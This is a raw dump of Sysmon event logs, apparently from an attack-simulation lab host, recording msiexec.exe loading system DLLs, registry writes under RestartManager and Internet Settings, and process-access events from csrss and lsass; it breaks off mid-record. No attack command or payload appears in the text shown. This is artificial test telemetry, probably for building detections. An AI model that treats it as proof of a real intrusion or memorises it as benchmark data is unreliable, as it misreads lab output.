WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691853Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691852Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691851Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691850Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691849Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691848Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691847Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691846Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691845Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691844Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691843Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691842Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691841Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-EE55-62A8-0500-000000006202}396412C:\Windows\system32\csrss.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691840Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981D-62AC-1A6B-000000006202}48401780C:\Windows\system32\msiexec.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002691839Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding E94EFC5B984B074B60D8A3559AD758E4C:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 734700x80000000000000002691838Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ntmarta.dll10.0.14393.0 (rs1_release.160715-1616)Windows NT MARTA providerMicrosoft® Windows® Operating SystemMicrosoft Corporationntmarta.dllMD5=854A3CAE7C97B630158C9F7EE8555970,SHA256=20F0A4D99C5095A0CAC39B816BFC987F64CD051843C79E027714666375986176trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691837Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.522{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\pcacli.dll10.0.14393.0 (rs1_release.160715-1616)Program Compatibility Assistant Client ModuleMicrosoft® Windows® Operating SystemMicrosoft Corporation-MD5=012B8825E588F74439D55115ED1FE5AD,SHA256=D646D30D2538E47FEFB9C1D5B323476B2701822FF6BCC91155C40BAA6710975EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 13241300x80000000000000002691834Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002691833Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002691832Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002691831Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002691830Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002691829Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 734700x80000000000000002691828Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002691827Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.491{7CF983DC-981D-62AC-1A6B-000000006202}4840920C:\Windows\system32\msiexec.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+e03e7|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 13241300x80000000000000002691824Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.491{7CF983DC-EE54-62A8-EB03-000000000000}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\System32\msiexec.exeQWORD (0x01d8825b-0x9ec70ffa)NT AUTHORITY\SYSTEM 734700x80000000000000002691704Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.366{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002691674Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.366{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691641Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.366{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002691616Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691583Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\wininet.dll11.00.14393.5127 (rs1_release_inmarket.220514-1756)Internet Extensions for Win32Internet ExplorerMicrosoft Corporationwininet.dllMD5=CB9D348470B507BC5761495A04335B06,SHA256=F538BC5C83DC2A3ECAF99BA1786066A6D511DA2BC3971B937882171315AA46C0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691558Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691557Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 13241300x80000000000000002691555Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettingsBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002691554Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsNT AUTHORITY\SYSTEM 12241200x80000000000000002691553Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsNT AUTHORITY\SYSTEM 13241300x80000000000000002691552Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)NT AUTHORITY\SYSTEM 12241200x80000000000000002691551Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet SettingsNT AUTHORITY\SYSTEM 12241200x80000000000000002691550Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsNT AUTHORITY\SYSTEM 12241200x80000000000000002691549Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsNT AUTHORITY\SYSTEM 12241200x80000000000000002691548Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.350{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsNT AUTHORITY\SYSTEM 734700x80000000000000002691545Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 13241300x80000000000000002691518Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000002691517Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)NT AUTHORITY\SYSTEM 734700x80000000000000002691516Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\wldp.dll10.0.14393.5006 (rs1_release.220301-1704)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=E0E13482A64635E305045F9EECAF4F53,SHA256=68291C8D8C6C8CDC112A9BA73B28C5C29CD87017E96DBCC5009B9BCDBDDEF326trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 13241300x80000000000000002691515Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000002691514Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000)NT AUTHORITY\SYSTEM 12241200x80000000000000002691492Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMapNT AUTHORITY\SYSTEM 734700x80000000000000002691489Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691488Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691487Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\wintrust.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691485Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.287{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002691484Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.272{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691483Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 